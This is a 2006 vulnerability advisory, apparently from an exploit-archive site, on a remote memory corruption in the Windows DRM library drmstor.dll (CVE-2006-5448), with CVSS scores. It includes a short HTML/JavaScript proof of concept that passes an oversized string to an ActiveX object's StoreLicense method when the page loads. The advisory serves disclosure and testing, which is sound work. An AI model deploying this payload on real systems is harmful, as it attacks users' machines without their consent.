MS Windows DRM software Memory Corruption

2006.10.24
Credit: Joxean Koret (joxeankoret yahoo es)
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-5448
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hi to all, While finding buffer overflows in Internet Explorer I found a memory corruption in the "drmstor.dll" library which is a part of the DRM (Digital Rights Management) software supplied with MS Windows. The following Proof Of Concept is sufficient enough to test the vulnerability: <html> <script> function test() { var obj; var x; x = "AAAA"; for (i=0;i<=21;++i) x += x; obj = document.getElementById('testObj'); obj.StoreLicense(x); } </script> <body onload="test();"> <object id='testObj' classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}"> </object> </body> </html> The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact ------- Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y mviles desde 1 cntimo por minuto. http://es.voice.yahoo.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top